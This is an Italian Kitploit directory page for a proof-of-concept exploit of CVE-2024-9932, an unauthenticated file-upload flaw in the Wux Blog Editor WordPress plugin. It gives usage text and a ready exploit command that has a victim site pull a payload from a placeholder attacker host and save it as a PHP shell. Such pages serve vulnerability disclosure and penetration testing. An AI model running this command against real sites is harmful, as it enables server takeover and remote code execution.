Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-9932-POC | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-9932-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2024-9932-poc

CVE-2024-9932-POC

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-9932-POC

Descrizione:

Il plugin WordPress Wux Blog Editor è vulnerabile al caricamento arbitrario di file a causa di una validazione insufficiente del tipo di file nella funzione wuxbt_insertImageNew. Sono interessate le versioni fino alla 3.0.0 inclusa. Questa vulnerabilità consente a utenti non autenticati di caricare file arbitrari sul server, portando potenzialmente all'esecuzione remota di codice (RCE).

Dettagli della vulnerabilità

La vulnerabilità deriva da una validazione impropria del tipo di file nella funzione wuxbt_insertImageNew. Ciò consente agli attaccanti di caricare file dannosi sul server senza autenticazione.

Scenario di attacco:

root@kitploit:~
L'attaccante identifica un sito web che utilizza il plugin vulnerabile.
Sfrutta la funzionalità di caricamento file per caricare una shell PHP dannosa.
Esegue comandi sul server compromesso.

Utilizzo

root@kitploit:~
usage:CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]

Wux Blog Editor - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress server, e.g., http://192.168.100.74/wordpress
  -ur REMOTE_URL,       --remote-url REMOTE_URL
                        Remote file URL, e.g., http://192.168.100.54/shell.txt
  -n NAME, --name NAME  Desired file name, e.g., Nxploit.php

Comando di exploit

root@kitploit:~
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php

Risultati

Esempio di caricamento riuscito

1- File trovato:

2- Risultato dell'esecuzione: Naviga all'URL del file per eseguire il payload.

root@kitploit:~
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php

Avvertenza

Questo strumento è solo a scopo educativo. L'uso non autorizzato di questo script su sistemi senza permesso è illegale.

Scarica lo strumento